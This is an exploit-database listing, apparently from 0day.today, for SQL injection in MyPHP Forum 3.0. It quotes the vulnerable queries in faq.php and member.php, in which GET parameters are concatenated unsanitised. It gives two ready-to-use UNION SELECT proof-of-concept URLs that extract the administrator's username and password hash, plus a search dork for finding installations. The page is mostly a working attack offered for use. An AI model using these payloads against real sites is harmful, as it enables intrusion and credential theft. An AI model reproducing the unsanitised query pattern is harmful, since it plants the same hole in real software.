[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MyPHP Forum <= 3.0 (Final) Multiple SQL Injection Vulnerabilities

Author
x0kster
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2430
Category
web applications
Date add
31-12-2007
Platform
unsorted
=================================================================
MyPHP Forum <= 3.0 (Final) Multiple SQL Injection Vulnerabilities
=================================================================




Name            :  MyPHP Forum <= 3.0 (Final) Multiple Remote SQL Injection Vulnerability
Author          :  x0kster
Script Download :  http://www.myphp.ws/
Date            :  31/12/2007
Dork            :  "Powered by: MyPHP Forum"

Note: 
For work, magic_quotes_gpc must be turned off on the server.
Usally the table prefix is 'nb'.



Sql injection in faq.php

   <?php
    //faq.php
    [...]
    $id = $_GET['id'];
    if($action == "view" && !empty($id)) {
	$result = mysql_query("SELECT * from $db_faq WHERE id='$id'") or die(mysql_error()); // <-- So miss a control :-D
	$row = mysql_fetch_array($result);
	$row[answer] = postify($row[answer]);
    [...]
   ?>

So we can execute an sql injection thrught the bugged variable $id.

PoC:

http://Site/faq.php?action=view&id=-1'+union+select+1,concat(username,0x3a,password),3+from+{table_prefix}_member+where+uid=1/*




Sql injection in member.php

   <?php
    //member.php
   [...]
    if($action == "viewpro") {
	$member = $HTTP_GET_VARS['member'];
	$query = mysql_query("SELECT * FROM $db_member WHERE username='$member'") or die(mysql_error());
   [...]
   ?>

So $member variable isn't controlled so we can exploit it.

PoC:

http://Site/member.php?action=viewpro&member=-1'+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22+from+{table_prefix}_member+where+uid=1/*



#  0day.today [2024-12-25]  #